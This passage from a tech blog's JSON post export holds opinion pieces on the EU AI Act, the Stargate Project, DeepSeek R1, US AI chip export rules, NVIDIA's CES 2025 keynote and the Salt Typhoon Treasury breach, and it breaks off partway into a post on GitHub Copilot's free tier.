The Act\u0026rsquo;s risk-based approach is sensible, and the focus on prohibited practices targets genuinely harmful applications. These practical implications are explored in depth in the compliance requirements developers need to implement.\nOn the other hand, I worry about the compliance burden on smaller companies and open-source projects. The Act includes some exemptions for research and open-source, but the boundaries are unclear. And the pace of AI development is so fast that regulations drafted in 2022-2023 are already struggling to keep up with the reality of 2025.\nWhat I hope we don\u0026rsquo;t see is a repeat of the early GDPR days, where fear and uncertainty led to over-compliance and the blocking of useful services for European users. The AI Act is more nuanced than many people realize, and the risk-based approach means that most AI applications face relatively light requirements. But nuance tends to get lost in corporate compliance departments.\nFor now, the most important thing is awareness. Read the Act, understand where your systems fit, and start building compliance into your development process. The full enforcement timeline stretches to 2027, but the direction of travel is clear — and the earlier you start, the less painful the transition will be.\n","date":"6 February 2025","externalUrl":null,"permalink":"/posts/250206-eu-ai-act-takes-effect/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The first provisions of the EU AI Act are now enforceable. Here’s what the regulation means for developers building AI systems, and why you should care even if you’re not in Europe.","title":"EU AI Act Takes Effect — What Developers Need to Know Right Now","type":"posts"},{"content":"Last week, the tech world was still processing the Stargate Project announcement — a joint venture between OpenAI, SoftBank, and Oracle to pour up to $500 billion into AI infrastructure in the United States over the next four years. 
That\u0026rsquo;s not a typo. Half a trillion dollars, aimed at building out the data centers, power infrastructure, and compute capacity needed to train and serve the next generation of AI models.\nAs someone who\u0026rsquo;s watched infrastructure trends for decades — from the early days of colocation facilities to the cloud revolution — I find myself both impressed and cautious about what this signals.\nThe Scale Is Unprecedented # To put $500 billion in perspective, the entire global cloud infrastructure market was estimated at around $270 billion in 2024. The Stargate Project, if fully realized, would represent nearly double that figure concentrated in a single initiative. The initial $100 billion phase is already underway, with construction beginning on a massive campus in Abilene, Texas.\nThe consortium brings together complementary strengths: OpenAI\u0026rsquo;s model expertise, SoftBank\u0026rsquo;s capital and telecommunications infrastructure, Oracle\u0026rsquo;s enterprise cloud capabilities, and reportedly significant involvement from MGX (an Abu Dhabi-based technology investment vehicle). NVIDIA, ARM, and Microsoft are listed as technology partners.\nWhat strikes me most is the vertical integration play. This isn\u0026rsquo;t just about renting GPU time from existing cloud providers. It\u0026rsquo;s about building purpose-built facilities optimized from the ground up for AI workloads — from the power grid connection to the cooling systems to the network fabric between GPU clusters. This approach mirrors the infrastructure investments we\u0026rsquo;re seeing from competitors like NVIDIA and custom chip strategies like Google\u0026rsquo;s TPUs.\nWhy Now? The Compute Bottleneck Is Real # If you\u0026rsquo;ve tried to secure GPU capacity for training or fine-tuning models recently, you know the pain. Wait times for H100 clusters can stretch into months. Spot instance prices for AI-capable hardware remain eye-watering. 
The demand for AI compute is growing faster than the supply, and the gap is widening.\nThe major cloud providers — AWS, Azure, and Google Cloud — have all been investing heavily in their own AI infrastructure, but even their combined capital expenditure hasn\u0026rsquo;t kept pace with demand. This challenge parallels broader cloud infrastructure and platform engineering concerns about optimal resource utilization and scaling. Amazon alone committed to spending $75 billion on infrastructure in 2025, much of it AI-related. Google and Microsoft are in a similar arms race.\nThe Stargate Project represents a bet that we\u0026rsquo;ll need dramatically more compute than even the hyperscalers are planning for. Whether you believe that bet depends on your view of where AI is heading — are we approaching diminishing returns on scaling, or are there still orders-of-magnitude improvements to unlock with bigger models and more data?\nImplications for Developers and Enterprises # For those of us building applications on top of AI infrastructure — running large language models and foundation models — this wave of investment has several practical implications. The efficiency gains from better model architectures will matter as much as raw infrastructure capacity.\nCost trajectory: More supply should eventually mean lower prices. If Stargate and similar investments materially increase the available compute pool, the cost of inference — running trained models — should continue to decline. That\u0026rsquo;s good news for anyone building AI-powered products. We\u0026rsquo;ve already seen inference costs drop dramatically over the past year, and more capacity should accelerate that trend.\nGeographic concentration: The focus on US-based infrastructure is notable, especially in the context of increasing AI regulation and data sovereignty concerns in Europe. 
For European developers and enterprises, this raises questions about latency, data residency, and dependence on US infrastructure for critical AI capabilities. It\u0026rsquo;s something I\u0026rsquo;m watching closely from here in the Netherlands.\nPlatform dynamics: The involvement of Oracle as a key infrastructure partner is interesting. Oracle has been aggressively repositioning its cloud business around AI workloads, and this partnership could boost its credibility in a market still dominated by AWS, Azure, and GCP. For developers, having more viable infrastructure options is generally a good thing: competition drives innovation and keeps pricing honest.\nThe Elephant in the Room: Power # Every conversation about massive AI data centers eventually comes back to power. Training large language models is extraordinarily energy-intensive, and the projected power requirements for facilities of this scale are staggering. Some estimates suggest that AI data center power consumption could double or triple by 2028.\nThe Stargate announcement was light on details about power sourcing, though there have been mentions of exploring nuclear and renewable options. This is where I start to feel uneasy. We\u0026rsquo;re making enormous infrastructure bets on the assumption that we\u0026rsquo;ll figure out the power problem. And while I\u0026rsquo;m optimistic about nuclear energy\u0026rsquo;s potential role, the timelines for bringing new nuclear capacity online don\u0026rsquo;t align well with the pace of data center construction.\nAs engineers, we should also be thinking about efficiency. There\u0026rsquo;s meaningful work happening on model compression, quantization, and more efficient architectures with smaller models. The combination of infrastructure investment and efficiency improvements will drive sustainable AI development. 
The most sustainable path forward likely combines more efficient models with more infrastructure, not just brute-force scaling.\nMy Take # I\u0026rsquo;ve seen enough infrastructure build-outs to know that the announced number and the actual spend often diverge significantly. $500 billion is an aspiration, not a commitment. The real test will be whether the initial $100 billion phase delivers results compelling enough to justify the rest.\nThat said, the directional signal is clear: the biggest players in tech believe we\u0026rsquo;re in the early innings of AI infrastructure build-out, not the late innings. Whether you\u0026rsquo;re a developer choosing which cloud to build on, an enterprise planning your AI strategy, or an infrastructure engineer thinking about your next role — this is worth paying attention to.\nThe era of AI infrastructure as a strategic asset, not just a utility, is here. And the scale of investment being mobilized suggests that the companies behind Stargate believe the returns will justify the spend. Time will tell if they\u0026rsquo;re right, but in the meantime, the rest of us should be thinking about what a world with dramatically more AI compute looks like — and how to build for it.\n","date":"30 January 2025","externalUrl":null,"permalink":"/posts/250130-stargate-project-ai-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The newly announced Stargate Project promises $500B in AI infrastructure investment. What does this mean for the cloud landscape and developers building on top of it?","title":"The Stargate Project — $500 Billion and the Future of AI Infrastructure","type":"posts"},{"content":"This week, Chinese AI lab DeepSeek released R1, a reasoning-focused large language model that\u0026rsquo;s turning heads across the AI community. 
Not because reasoning models are new — OpenAI\u0026rsquo;s o1 has been available since September — but because of what DeepSeek has achieved and how they\u0026rsquo;ve released it. R1 matches or exceeds o1-preview on most major benchmarks, the full model weights are available under an MIT license, and the technical paper suggests it was trained at a fraction of the cost that US labs typically spend.\nI\u0026rsquo;ve spent the past two days reading the paper, testing the model, and talking to colleagues about the implications. This is one of those releases that deserves more than a headline.\nWhat Makes R1 Different # DeepSeek R1 is a reasoning model, meaning it\u0026rsquo;s designed to \u0026ldquo;think through\u0026rdquo; complex problems step by step before producing an answer. This is the same paradigm that OpenAI introduced with reasoning models — the model generates a chain of thought, exploring different approaches and self-correcting before arriving at a final answer. The difference is that OpenAI keeps their reasoning hidden and the model proprietary. DeepSeek shows you the reasoning and gives you the weights.\nThe benchmark numbers are impressive. R1 scores competitively with o1 on math (AIME, MATH-500), coding (Codeforces, SWE-Bench), and general reasoning tasks. On some benchmarks, it outperforms o1-preview. These aren\u0026rsquo;t cherry-picked results — the scores are broadly strong across categories.\nBut what\u0026rsquo;s technically fascinating is the training approach. The technical paper describes a process that starts with pure reinforcement learning on a base model, without supervised fine-tuning first. This \u0026ldquo;cold start\u0026rdquo; RL approach led to emergent reasoning behaviors — the model learned to decompose problems, verify intermediate steps, and re-examine its assumptions, all from the reward signal alone. 
They then used this RL-trained model to generate synthetic data for a more polished final version.\nThe paper is refreshingly detailed. While OpenAI\u0026rsquo;s o1 system card was notably sparse on technical details, DeepSeek provides enough information to understand and potentially reproduce their approach. This transparency is valuable for the research community regardless of what you think about the geopolitics.\nThe Cost Question # Perhaps the most provocative aspect of DeepSeek\u0026rsquo;s work is the claimed training cost. While exact figures aren\u0026rsquo;t published in the paper, estimates based on their described compute setup suggest R1 was trained for roughly $5-6 million — a fraction of the hundreds of millions that frontier labs in the US reportedly spend on their latest models.\nThere are important caveats here. DeepSeek builds on their existing V3 base model, so the total investment is higher than just the R1 training run. They may benefit from lower labor costs. And comparing training costs across organizations is notoriously difficult because of different accounting practices and infrastructure setups.\nStill, even accounting for these factors, the efficiency is remarkable. DeepSeek reportedly used around 2,000 NVIDIA H800 GPUs (the China-export-compliant variant of the H100) for their training runs. If they\u0026rsquo;re achieving frontier-competitive results with this setup, it challenges the narrative that you need 100,000+ H100 clusters and billions in investment to build competitive AI models.\nThis has implications for the entire AI industry. If the scaling laws are less about brute-force compute and more about clever training approaches, the moat around well-funded US labs is narrower than many assumed. 
And for smaller companies and research labs, it means competitive AI development might be more accessible than the current \u0026ldquo;compute is everything\u0026rdquo; narrative suggests.\nThe Open-Source Impact # R1 is released under the MIT license — the most permissive common open-source license. You can use it commercially, modify it, distribute it, and build products on top of it without restrictions. DeepSeek also released six distilled versions, ranging from 1.5B to 70B parameters, built by distilling R1\u0026rsquo;s reasoning capabilities into smaller Qwen and Llama-based models.\nThe distilled models are particularly useful. The 32B distilled version performs remarkably well relative to its size — it outperforms o1-mini on several benchmarks while being small enough to run on consumer hardware or a single cloud GPU. For developers who want reasoning capabilities in their applications without the cost of running a 671B parameter model, these distilled versions are immediately practical.\nThis release enriches the open-source AI ecosystem significantly. We now have open reasoning models that are genuinely competitive with the best proprietary offerings. Combined with other open foundation models and their evolving capabilities, the open-source AI stack is reaching a point where you can build sophisticated AI applications entirely on open models.\nThe Geopolitical Dimension # I\u0026rsquo;d be remiss not to acknowledge the elephant in the room. DeepSeek is a Chinese company. Last week I wrote about the Biden administration\u0026rsquo;s AI Diffusion Rule, which aims to control China\u0026rsquo;s access to advanced AI chips. And here\u0026rsquo;s a Chinese lab producing frontier-competitive models using export-restricted hardware variants.\nThis creates an uncomfortable tension in the US policy narrative. If Chinese labs can match US model capabilities despite chip restrictions, the strategic value of those restrictions becomes less clear. 
The counterargument is that restrictions slow progress and prevent access to the very best hardware, which may matter at the true frontier. But R1 suggests the gap, if it exists, is narrower than many policymakers assumed.\nFor developers and engineers, the geopolitics is mostly noise. What matters is whether the model is good, whether you can use it, and whether it\u0026rsquo;s safe and reliable for your use case. As AI regulation like the EU AI Act develops, understanding the governance landscape for open-source models becomes increasingly important. On those practical dimensions, R1 delivers.\nMy Take # I\u0026rsquo;ve been building software for three decades, and I\u0026rsquo;ve learned to be skeptical of \u0026ldquo;X killer\u0026rdquo; claims. But DeepSeek R1 is genuinely significant. Not because it \u0026ldquo;kills\u0026rdquo; o1 — both are excellent models with different trade-offs — but because it demonstrates that the frontier of AI isn\u0026rsquo;t a walled garden.\nThe fact that a fully open-source model can compete with the best proprietary reasoning models fundamentally changes the conversation about AI strategy. If you\u0026rsquo;re an enterprise evaluating AI vendors, you now have a credible open-source reasoning option. If you\u0026rsquo;re a startup, you can build on R1 without API costs or vendor lock-in. If you\u0026rsquo;re a researcher, you can study and improve upon a frontier reasoning model instead of just probing it through an API.\nWe\u0026rsquo;re still early in understanding what R1 means for the industry. But sitting here today, testing a locally-running reasoning model that rivals the best in the world, available under an MIT license — this feels like one of those moments that shifts the landscape. 
The open-source AI movement just got a very powerful new data point in its favor.\n","date":"23 January 2025","externalUrl":null,"permalink":"/posts/250123-deepseek-r1-open-source-reasoning/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepSeek’s R1 reasoning model, released as fully open-source with an MIT license, demonstrates that frontier AI capabilities aren’t exclusive to US labs anymore.","title":"DeepSeek R1 — Open-Source Reasoning Models Change the Game","type":"posts"},{"content":"With just days left in the Biden administration, the Commerce Department has published its most ambitious AI-related regulation yet: the AI Diffusion Rule, a sweeping framework that creates a three-tier system governing the export of advanced AI chips and model weights. Whether you\u0026rsquo;re building AI systems, deploying them internationally, or simply relying on cloud infrastructure, this rule will ripple through the industry for years.\nThe rule, which was published on January 15 and is set to take effect in 120 days, moves beyond the existing entity-specific export controls on China and creates a global framework. It\u0026rsquo;s arguably the most significant piece of technology policy to come out of this administration, and it arrives at a moment when the incoming Trump administration\u0026rsquo;s approach to AI regulation remains uncertain.\nThe Three-Tier Framework # The rule divides the world into three tiers for purposes of advanced AI chip exports:\nTier 1 consists of 18 close allies and partners — including the EU, UK, Japan, South Korea, Australia, and others. These countries face essentially no restrictions. Companies headquartered in Tier 1 nations can purchase and deploy advanced GPUs (think NVIDIA H100s, A100s, and future generations) without meaningful limitations.\nTier 2 covers most of the rest of the world — roughly 120 countries. 
Companies in these countries can import a limited number of advanced AI chips (up to about 50,000 GPUs per company) without a license. Beyond that threshold, they need to obtain \u0026ldquo;Universal Verified End User\u0026rdquo; (UVEU) status from the US government, essentially promising the chips won\u0026rsquo;t be diverted.\nTier 3 is the restricted group: China, Russia, Iran, North Korea, and a handful of others. These countries remain under the tightest restrictions, with effectively no access to the most advanced AI chips.\nThe framework also introduces controls on closed-weight AI model exports. Models exceeding certain compute thresholds during training would require licenses for deployment in Tier 2 and Tier 3 countries. Open-weight models are explicitly exempted, which is a notable win for the open-source AI community.\nWhy This Matters for Developers # If you\u0026rsquo;re a developer or architect working on AI deployments, the practical implications depend entirely on where you and your users are located. These controls intersect with global AI governance frameworks like the EU AI Act, creating a complex regulatory landscape for deployment and compliance decisions.\nFor those of us in Europe, the impact is minimal — the Netherlands, along with the rest of the EU, sits comfortably in Tier 1. We can continue procuring and deploying whatever compute we need. But if you\u0026rsquo;re building services for international customers, particularly in Southeast Asia, the Middle East, Africa, or Latin America, you now need to think about the compute geography of your deployments.\nThe 50,000 GPU cap for Tier 2 countries is meaningful. That sounds like a lot, but for major cloud providers trying to build data center capacity in places like India, Brazil, or the UAE, it\u0026rsquo;s actually quite limiting. A single large training cluster can use 10,000 to 30,000 GPUs. 
This rule effectively constrains the build-out of AI compute capacity in Tier 2 nations unless those countries negotiate UVEU frameworks with the US.\nThe cloud implications are interesting too. The rule includes provisions for \u0026ldquo;headquarter-based\u0026rdquo; exemptions — if a Tier 1 company (say, Microsoft or Google) operates data centers in Tier 2 countries, they can receive higher allocations, but with conditions around security and access controls. This could give the US hyperscalers a structural advantage over local cloud providers in Tier 2 markets.\nThe Geopolitical Chess Game # Let\u0026rsquo;s be honest about what\u0026rsquo;s really going on. This rule is primarily about China. The original chip export controls in October 2022 were targeted but leaky — Chinese companies found workarounds through third countries and slightly modified chip designs. The AI Diffusion Rule is an attempt to plug those gaps by controlling the entire global distribution, not just the China-facing exports.\nThe strategy is clear: rather than playing whack-a-mole with specific entities and chip models, create a comprehensive framework that controls the global flow of AI compute. It\u0026rsquo;s a recognition that in a world where AI chips are the new strategic resource, you need something more like an oil export regime than traditional tech export controls.\nNVIDIA has already pushed back, arguing the rule could drive customers to foreign competitors and fragment the global tech ecosystem. Their concern isn\u0026rsquo;t unfounded — Huawei\u0026rsquo;s Ascend AI chips, while less capable than NVIDIA\u0026rsquo;s best, are being deployed at scale within China. If Tier 2 countries find US-made chips too difficult to procure, they might look to alternatives.\nThe Open-Source Exemption # One detail that\u0026rsquo;s getting less attention than it deserves: the rule explicitly exempts open-weight model exports from the licensing requirements. 
This means models like Meta\u0026rsquo;s Llama, Mistral\u0026rsquo;s offerings, and other openly released models can be deployed anywhere in the world without additional export controls.\nThis is significant policy. It suggests the administration recognizes a distinction between compute infrastructure (which is physically constrained and controllable at borders) and model weights (which are essentially information and practically impossible to control once released). By exempting open-source models, the rule avoids the absurdity of trying to control the distribution of files that are already freely available on the internet.\nFor the open-source AI community, this is a meaningful victory. Models like DeepSeek R1 demonstrate what\u0026rsquo;s possible with open-source reasoning models released globally. It preserves the ability to share AI research and models globally, even as the underlying compute infrastructure becomes more controlled.\nMy Take # I have mixed feelings about this rule. On one hand, I understand the national security logic. Advanced AI capabilities are genuinely dual-use, and there are legitimate reasons to want to control which governments have access to the most powerful AI systems. The three-tier approach is more nuanced than a blanket ban.\nOn the other hand, as someone who\u0026rsquo;s spent decades in an industry built on global collaboration and open standards, I\u0026rsquo;m uncomfortable with the trajectory. The internet was designed to be borderless. Open source thrived because code could flow freely. Introducing export controls on compute and model weights — even well-intentioned ones — starts to balkanize the global technology ecosystem.\nThe practical question is whether the incoming Trump administration will keep, modify, or scrap this rule. The 120-day implementation timeline means it won\u0026rsquo;t take full effect until mid-May, giving the new administration ample time to intervene. 
Given the political dynamics around both China hawkishness and tech industry lobbying, the outcome is genuinely hard to predict.\nWhat\u0026rsquo;s clear is that AI governance is no longer a theoretical discussion. It\u0026rsquo;s becoming trade policy, export control, and geopolitics. For those of us who just want to build useful software, the complexity of the operating environment just increased significantly.\n","date":"16 January 2025","externalUrl":null,"permalink":"/posts/250116-biden-ai-diffusion-rule/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Biden administration’s new AI Diffusion Rule creates a three-tier system for GPU exports, reshaping the global AI compute landscape.","title":"Biden's AI Diffusion Rule — Chip Export Controls Get Real","type":"posts"},{"content":"CES has long been a consumer electronics show at heart — a place for TVs, gadgets, and concept cars. But Jensen Huang\u0026rsquo;s two-hour keynote this week made it clear that NVIDIA has essentially turned CES into an AI infrastructure conference. The announcements were dense, ambitious, and consequential for anyone building or deploying AI systems.\nThe headline consumer product — the GeForce RTX 5090 and 5070 series based on the new Blackwell architecture — is impressive on its own. But what caught my attention were three announcements that matter more for the broader technology landscape: Project DIGITS, the Cosmos foundation models, and NVIDIA\u0026rsquo;s deepening push into physical AI and robotics.\nProject DIGITS: A Personal AI Supercomputer # The most surprising announcement, at least to me, was Project DIGITS — a desktop-sized device powered by the new GB10 Grace Blackwell Superchip that can run 200-billion-parameter AI models locally. It runs NVIDIA\u0026rsquo;s DGX OS (Linux-based), has 128GB of unified memory, up to 4TB of NVMe storage, and delivers a petaflop of AI computing performance. 
Two units can be linked for even larger models. Price: $3,000, shipping in May.\nLet me put this in perspective. When I first started working with neural networks in the late \u0026rsquo;90s, training even modest models required access to university computing clusters. Five years ago, running a large language model required cloud GPU instances costing thousands per month. Now NVIDIA is putting a petaflop of AI compute on your desk for the price of a high-end laptop.\nThis matters enormously for AI development workflows. Running inference and fine-tuning locally means faster iteration, no cloud costs, and no data leaving your premises. For startups, researchers, and independent developers, DIGITS could democratize access to the kind of AI experimentation that\u0026rsquo;s currently gatekept by cloud GPU availability and pricing.\nThe 200B parameter capacity is the sweet spot too — it covers running Meta\u0026rsquo;s Llama models, Mistral\u0026rsquo;s offerings, and many other open-weight models at full precision. You could realistically run a competitive AI application entirely on local hardware.\nCosmos: Foundation Models for Physical AI # NVIDIA also announced Cosmos, a platform of world foundation models designed for physical AI development — robotics, autonomous vehicles, and industrial automation. These are generative models that understand physics and can generate synthetic environments for training robots and autonomous systems.\nThis is NVIDIA playing the long game. The current AI boom is primarily about language and image generation. But the next wave — the one NVIDIA is positioning for — is about AI that interacts with the physical world. Training a robot to navigate a warehouse or a vehicle to handle edge cases requires massive amounts of scenario data. 
Generating that synthetically is orders of magnitude cheaper and faster than collecting it in the real world.\nThe Cosmos models are being released as open-source under the NVIDIA Open Model License, which is a smart community-building move. By providing foundational world models freely, NVIDIA ensures that the entire physical AI ecosystem develops on their platform and hardware. The models are free; the GPUs to run them are not.\nThe Blackwell Architecture in Consumer GPUs # The Blackwell architecture is NVIDIA\u0026rsquo;s core compute platform for the next generation of AI infrastructure. The RTX 5090 brings this architecture — previously reserved for data center GPUs — to consumer hardware. The standout feature is the fifth-generation Tensor Cores and a new neural rendering pipeline that NVIDIA calls \u0026ldquo;the biggest generational leap\u0026rdquo; in their history.\nThe interesting technical story here is how NVIDIA is using AI to make traditional computing faster. Their new DLSS 4 with Multi Frame Generation can generate up to three frames for every traditionally rendered frame, using AI models that run on the Tensor Cores. The GPU is essentially doing less traditional rasterization and more AI inference to produce the final image.\nThis approach — using AI acceleration to improve performance in non-AI workloads — is going to spread well beyond gaming. We\u0026rsquo;re already seeing it in video encoding, image processing, and audio. The pattern of \u0026ldquo;compute the answer approximately with traditional methods, then use AI to refine it\u0026rdquo; is becoming a general-purpose optimization strategy.\nThe Infrastructure Play # Zooming out, what struck me most about the keynote was how thoroughly NVIDIA has positioned itself across every layer of the AI stack. They make the chips (Grace, Blackwell). They make the systems (DGX, HGX, DIGITS). They provide the software platform (CUDA, cuDNN, TensorRT, Triton). 
They\u0026rsquo;re building foundation models (Cosmos). They have the networking (Spectrum-X, NVLink). And they have the cloud partnerships (every major cloud provider).\nThis vertical integration is reminiscent of what made IBM dominant in enterprise computing for decades. The difference is that NVIDIA doesn\u0026rsquo;t lock you in the same way — CUDA notwithstanding — because the underlying models and many tools are open source. But the practical effect is similar: if you\u0026rsquo;re building AI infrastructure to run foundation models at scale, you\u0026rsquo;re almost certainly building on NVIDIA\u0026rsquo;s stack.\nThe competition isn\u0026rsquo;t standing still. AMD\u0026rsquo;s MI300X is gaining traction in data centers. Intel\u0026rsquo;s Gaudi accelerators are finding niches. Google\u0026rsquo;s custom TPU investments and Amazon\u0026rsquo;s Trainium offerings represent real alternatives in the market. But at CES, NVIDIA demonstrated why they remain the gravitational center of AI computing: they\u0026rsquo;re not just selling chips, they\u0026rsquo;re selling an ecosystem.\nMy Take # I\u0026rsquo;ve attended CES presentations that felt like tech demos looking for a problem. This wasn\u0026rsquo;t one of those. Every announcement connected to a clear market need: cheaper local AI inference (DIGITS), better training data for robotics (Cosmos), and continued gaming dominance (RTX 50 series).\nThe DIGITS device is what I\u0026rsquo;m most excited about personally. At $3,000, it\u0026rsquo;s within reach for serious independent developers and small teams. If it delivers on the promise of running 200B parameter models locally with reasonable performance, it could shift a meaningful chunk of AI development away from cloud providers and back to local hardware. That has implications for privacy, cost, and the pace of experimentation.\nJensen\u0026rsquo;s keynote ran over two hours and could have run four. 
The density of announcements reflects a company that\u0026rsquo;s firing on all cylinders. Whether you\u0026rsquo;re building AI applications, deploying infrastructure, or just trying to understand where the industry is headed, NVIDIA\u0026rsquo;s CES showing is required viewing.\n","date":"9 January 2025","externalUrl":null,"permalink":"/posts/250109-nvidia-ces-2025-ai-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s CES 2025 keynote unveiled the RTX 5090, Project DIGITS personal AI supercomputer, and Cosmos foundation models — cementing their grip on AI infrastructure.","title":"NVIDIA at CES 2025 — Jensen's Vision for AI Infrastructure","type":"posts"},{"content":"We\u0026rsquo;re barely into 2025 and the cybersecurity landscape is already demanding attention. In late December, the US Treasury Department confirmed it was breached by Chinese state-sponsored hackers through a compromised third-party service provider — BeyondTrust, a company specializing in, of all things, privileged access management. The irony isn\u0026rsquo;t lost on anyone in the security community.\nThis breach is part of the larger Salt Typhoon campaign that\u0026rsquo;s been making headlines since the fall. What started as reports of telecom infiltrations — with AT\u0026amp;T, Verizon, and T-Mobile among the targets — has now expanded to include federal agencies. The scope of this campaign is staggering, and it\u0026rsquo;s the kind of story that should make every engineer rethink their assumptions about supply chain security.\nWhat Happened at Treasury # The attack vector is particularly instructive. BeyondTrust, which provides remote support and privileged access solutions to government agencies, discovered that attackers had obtained a key used to secure their cloud-based remote technical support service. 
With that key, the attackers could override security controls and remotely access Treasury Department workstations and unclassified documents.\nLet that sink in: a single compromised API key at a third-party vendor gave nation-state attackers access to federal government workstations. This isn\u0026rsquo;t a sophisticated zero-day exploit chain. It\u0026rsquo;s a supply chain compromise that leveraged trust relationships — the exact kind of attack that\u0026rsquo;s been the industry\u0026rsquo;s blind spot for years.\nThe Treasury Department has said the compromised service has been taken offline and there\u0026rsquo;s no evidence the attackers still have access. But the damage assessment is ongoing, and unclassified doesn\u0026rsquo;t mean unimportant — Treasury handles sensitive economic data, sanctions information, and financial intelligence.\nThe Supply Chain Problem Won\u0026rsquo;t Go Away # If this feels like déjà vu, it should. The pattern of sophisticated supply chain attacks is consistent: rather than attacking hardened primary targets directly, adversaries compromise trusted vendors and ride those trust relationships into their actual targets. These attacks reflect a broader shift in how critical infrastructure is being targeted by sophisticated threat actors.\nWhat makes this particularly challenging is that organizations are being told to adopt zero-trust architectures while simultaneously being forced to extend trust to dozens of SaaS providers, managed service providers, and cloud vendors. The Treasury Department presumably followed federal security guidelines. They presumably vetted BeyondTrust. And yet here we are.\nFor those of us building and deploying software, this raises uncomfortable questions. How many third-party services have API keys or tokens that could provide similar access to our infrastructure? How would we even detect if one of those keys was compromised? 
Most organizations I\u0026rsquo;ve worked with have at best a partial inventory of their third-party integrations and the access levels those integrations have been granted.\nThe Telecom Dimension # The broader Salt Typhoon campaign targeting telecommunications providers is arguably even more concerning. Reports suggest the attackers accessed call records, communications of specific targets (including individuals involved in government and political activities), and systems used for court-authorized wiretapping.\nThe telecom breaches highlight a fundamental tension in security policy. Governments mandate that telecom providers build lawful intercept capabilities — backdoors, essentially — and then act surprised when sophisticated adversaries find and exploit those same capabilities. The CALEA (Communications Assistance for Law Enforcement Act) infrastructure that enables wiretapping also creates a target for foreign intelligence services.\nThis is something I\u0026rsquo;ve argued about for years in various contexts: you cannot build a backdoor that only the \u0026ldquo;good guys\u0026rdquo; can use. Any deliberate weakness in a system is a weakness, period. The Salt Typhoon campaign is providing a very expensive real-world demonstration of this principle.\nWhat Engineering Teams Should Do # While most of us aren\u0026rsquo;t defending against nation-state actors directly, the lessons from Salt Typhoon apply broadly:\nAudit third-party access. Map every external service that has credentials, API keys, or tokens providing access to your infrastructure. Understand what level of access each one has. Apply least privilege ruthlessly — if a monitoring service only needs read access to metrics, it shouldn\u0026rsquo;t have write access to anything.\nRotate credentials proactively. Don\u0026rsquo;t wait for a breach disclosure. Implement regular rotation of API keys and service account credentials. 
If a vendor can\u0026rsquo;t support credential rotation, that\u0026rsquo;s a red flag worth discussing.\nMonitor for anomalous access patterns. The Treasury breach was initially detected by BeyondTrust itself. But organizations should have their own detection capabilities for unusual access patterns from third-party services — access at odd hours, from unexpected IP ranges, or to resources that aren\u0026rsquo;t typically accessed through that integration.\nEvaluate vendor security posture. Ask your critical vendors about their own security practices. SOC 2 reports are a start, but they\u0026rsquo;re backward-looking. Ask about their incident response times, their own supply chain security practices like SLSA, and how they\u0026rsquo;d notify you of a compromise.\nMy Take # I\u0026rsquo;ve been in this industry long enough to remember when \u0026ldquo;perimeter security\u0026rdquo; was considered sufficient. We moved to defense-in-depth, then to zero trust, and yet we keep getting caught by the same fundamental problem: we have to trust something, and attackers are very good at finding and exploiting those trust relationships.\nThe Salt Typhoon campaign isn\u0026rsquo;t just a government problem or a telecom problem. It\u0026rsquo;s a preview of the threat landscape for 2025. Nation-state groups are patient, well-resourced, and increasingly targeting the connective tissue between organizations rather than the organizations themselves, exploiting the same trust relationships that our systems depend on.\nIf there\u0026rsquo;s one New Year\u0026rsquo;s resolution worth making for your engineering team, it\u0026rsquo;s this: spend a day mapping your third-party trust relationships and honestly assessing how a compromise at any one of them would affect your systems. 
The answer will probably keep you up at night — but that\u0026rsquo;s better than finding out the hard way.\n","date":"2 January 2025","externalUrl":null,"permalink":"/posts/250102-salt-typhoon-treasury-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Chinese state-sponsored Salt Typhoon campaign breached the US Treasury Department, exposing how even the most security-conscious organizations remain vulnerable.","title":"Salt Typhoon and the Treasury Breach — State-Sponsored Hacking Hits Home","type":"posts"},{"content":"Just before the holidays, GitHub dropped what might be the most consequential developer tooling announcement of the year: Copilot is now free for everyone. Not a trial. Not a limited preview. A genuine free tier with 2,000 code completions and 50 chat messages per month in VS Code. For a tool that\u0026rsquo;s been at the center of the AI-assisted development conversation since 2021, this is a big deal.\nI\u0026rsquo;ve been using Copilot since the technical preview, and I\u0026rsquo;ve watched it evolve from a curious autocomplete experiment into something that genuinely changes how I write code day-to-day. Competition from other AI development tools built on foundation models has accelerated this shift. Making it free isn\u0026rsquo;t just a pricing decision — it\u0026rsquo;s GitHub betting that AI assistance will become as fundamental to development as syntax highlighting.\nThe Strategic Play # Let\u0026rsquo;s be clear about what\u0026rsquo;s happening here. GitHub (and by extension Microsoft) isn\u0026rsquo;t doing this out of generosity. The AI coding assistant space has gotten crowded. Cursor and other AI-native IDEs have been gaining traction with their focus on deep AI integration. Codeium offers a competitive free tier. Amazon\u0026rsquo;s CodeWhisperer has been free for individual use since launch. JetBrains announced their own AI assistant. 
The market pressure is real.\nBy offering a free tier, GitHub is leveraging its most powerful asset: distribution. Over 100 million developers already have GitHub accounts. Most of them use VS Code. The friction to try Copilot just dropped to zero. That\u0026rsquo;s a moat that\u0026rsquo;s very hard for competitors to cross. As Copilot evolves into more agentic capabilities, the free tier strategy becomes even more critical for adoption.\nThe 2,000 completions per month limit is thoughtfully set. It\u0026rsquo;s enough for a hobbyist or student to get genuine value, but professional developers writing code eight hours a day will likely hit it and want to upgrade. It\u0026rsquo;s the classic freemium play, executed with the advantage of owning both the code hosting platform and the most popular editor.\nWhat the Free Tier Actually Includes # The free offering isn\u0026rsquo;t a stripped-down version. You get GPT-4o-powered completions and chat, access to Claude 3.5 Sonnet as an alternative model, and it works across VS Code and on github.com. Multi-file editing is included. The chat can reference your workspace context.\nWhat you don\u0026rsquo;t get: Copilot in your IDE of choice if it\u0026rsquo;s not VS Code (JetBrains, Neovim, and others require a paid plan), and you\u0026rsquo;re limited in the number of interactions. Enterprise features like organization-wide policy controls, IP indemnity, and audit logs are obviously not included.\nFor someone mentoring junior developers or teaching, this is excellent. I can now tell every student and every new team member to just enable Copilot without worrying about budget approval or trial expirations. That alone changes the onboarding conversation.\nThe Broader Implications for Developer Tools # This move accelerates something I\u0026rsquo;ve been thinking about for a while: AI assistance is becoming table stakes for code editors. 
